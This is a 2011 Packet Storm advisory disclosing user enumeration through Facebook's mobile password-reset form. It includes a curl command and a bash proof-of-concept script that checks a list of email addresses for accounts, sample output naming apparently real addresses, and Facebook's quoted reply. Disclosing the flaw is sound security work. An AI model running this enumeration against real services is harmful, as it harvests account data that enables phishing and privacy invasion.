Facebook Mobile User Enumeration

2011-08-03T00:00:00
ID PACKETSTORM:103660
Type packetstorm
Reporter Zerial
Modified 2011-08-03T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Facebook doesn't ensures the user information may  
not be collected by any bot or any automated process. Even though you  
can protect from this kind of attacks using captchas or tokens security  
into the forms.  
  
Step by step:  
  
- - Go to http://m.facebook.com  
  
- - Go to "Forgot your password" (http://m.facebook.com/reset.php?refid=0)  
  
- - Try using a real email address and try to use a fake email address,  
you will see two differents behavior.  
  
Well, now try to do a POST request to  
http://m.facebook.com/reset.php?refid=0 passing a email address through  
"ep" variable.  
  
Using cURL:  
  
curl -s -d "ep=test@mail.com" http://m.facebook.com/reset.php?refid=0  
  
  
This process has no validation for external or forgery site/form.  
  
  
Using the script:  
  
#--------------------  
#!/bin/bash  
for mail in $(cat $1);  
do  
s=$(curl -s -d "ep=$mail" http://m.facebook.com/reset.php?refid=0|grep  
form>/dev/null);  
if [ $? -eq 0 ]; then  
echo "$mail No tiene cuenta.";  
else  
echo "$mail Si tiene cuenta.";  
fi  
done  
  
#+----- EOF ------+  
  
  
You can ennumerate users by using a list of email address or phone numbers.  
  
$ sh poc.sh mails.txt  
putita666@yahoo.com NO  
chapalapachala@gmail.com YES  
esteban.gutierrez@gmail.com YES  
casatola@gmail.com YES  
casacasa@gmail.com NO  
berpnarf@hotmail.com NO  
asdfgsdfgerT@asdfgh.com NO  
  
  
  
  
Into the full version of facebook http://www.facebook.com this option is  
protected by a captcha to verify that we are human, in the mobile,  
version this validation doesn't exists. Facebooks says:  
  
[copy&paste]  
"Hi,  
  
While this style of information disclosure vulnerability may be  
applicable at a financial or banking website, it is a core part of  
the experience on social networks that are designed to connect email  
addresses to users. As another example, someone who desires to obtain  
this type of information could first load all of the email addresses  
into a throw-away email address book, and then utilize our contact  
importer tool. Requiring the registration of an account would not  
provide any significant additional friction.  
  
Alex Security Facebook"  
  
  
Details in  
http://www.securitybydefault.com/2011/08/busqueda-automatizada-de-cuentas.html  
  
Cheers,  
- --   
Zerial  
Seguridad Informatica  
GNU/Linux User #382319  
Blog: http://blog.zerial.org  
Jabber: zerial@jabberes.org  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.11 (GNU/Linux)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/  
  
iEYEARECAAYFAk44HXUACgkQIP17Kywx9JTfzwCgmpOtiEirsLQhWBON05rbVNtH  
XskAnAzjwC8gMJgajSUyEW7J7rxfjCZL  
=hGpN  
-----END PGP SIGNATURE-----  
  
`